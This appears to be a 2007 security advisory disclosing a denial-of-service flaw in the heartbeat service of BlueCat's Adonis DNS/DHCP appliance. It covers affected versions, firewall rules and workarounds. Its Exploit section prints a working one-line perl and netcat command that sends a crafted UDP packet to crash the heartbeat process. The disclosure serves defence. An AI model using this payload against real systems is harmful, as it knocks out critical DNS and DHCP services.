TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

Template Security Security Advisory

  BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

  Date: 2007-07-29
  Advisory ID: TS-2007-001-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/   Revision: 0

Contents

  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary

  Template Security has discovered a serious Denial of Service   (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP   Appliance. When XHA is configured to place two Adonis   servers in an active-passive pair to provide high   availability, a remote attacker can transmit a single UDP   datagram to crash the heartbeat control process. This can   be used for example to create an active/active condition in   the cluster pair.

Software Version

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

 Adonis version 5.0.2.8 was tested, and XHA was configured  using the Proteus IPAM appliance. It is possible any version  of Adonis using heartbeat version 1.2.4 or earlier is  vulnerable.

Details

  XHA on Adonis uses the heartbeat software from the Linux-HA   project (http://www.linux-ha.org/). On the version of   Adonis we tested, heartbeat version 1.2.3 is used. This   version is vulnerable to a well-known remote DoS attack   which was announced on 2006-08-13:

    http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt

Impact

  Successful exploitation of the vulnerability will result in   a DoS condition affecting critical DNS and DHCP services.

Exploit

  In this example the XHA cluster is composed of:

    node-1: 192.168.1.12
    node-2: 192.168.1.13
    VIP:    192.168.1.11

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

  A remote attacker can perform the following to crash the   heartbeat control process on node-1:

    $ perl -e 'print "###\n2147483647heart attack:%%%\n"' |       nc -u 192.168.1.12 694

  If node-1 is the active node in the cluster, node-2 will   take over the VIP and the cluster will be in an   active/active condition. Other scenarios are possible, such   as crashing the control process on the passive node to   prevent it from being able to assume the active role in a   failure condition.

  Note that the iptables configuration on Adonis does not   block packets to 694/udp; there is an explicit policy to   permit port 694/udp from any to any in the INPUT and OUTPUT   chain. To verify this, you can login as root on the   appliance and view the firewall configuration script:

    # grep 694 /usr/local/bluecat/doFirewall     iptables -A INPUT -p udp --dport 694 -j ACCEPT     iptables -A OUTPUT -p udp --dport 694 -j ACCEPT     $IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT     $IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT

Workarounds

  The attack can be prevented by blocking packets to 694/udp.   This can be performed at a firewall and by modifying the   iptables configuration on the Adonis appliances.   Appropriate anti-spoofing policies must also be in place,   because an attacker can spoof the source IP address in the   UDP datagram.

  When XHA was configured, iptables rules were configured in   /usr/local/bluecat/firewall_rules/localHAFirewallConfig to   permit 694/udp to and from the peer node on each appliance.   However, these rules have no effect due to the rules   mentioned above. And they are also incorrect because they   specify source port 694/udp, and the heartbeat packets we   observed do not use a fixed source port.

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

  One possible workaround which may be used to temporarily   prevent the attack is to comment out the 694/udp rules in   the firewall startup script then repair the rules in   localHAFirewallConfig. However, localHAFirewallConfig can   be overwritten by /usr/local/bluecat/configLocalFirewall.sh.   Due to this, we recommend that customers do not modify the   iptables configuration, and block 694/udp and perform   anti-spoofing at a firewall.

Obtaining Patched Software

  Contact the vendor.

Credits

  forloop discovered that Adonis XHA was using vulnerable   heartbeat software, and defaultroute read the heartbeat code   to discover the exploit. Both are members of Template   Security.

Revision History

  2007-07-29: Revision 0 released Received on Mon Jul 30 11:48:04 2007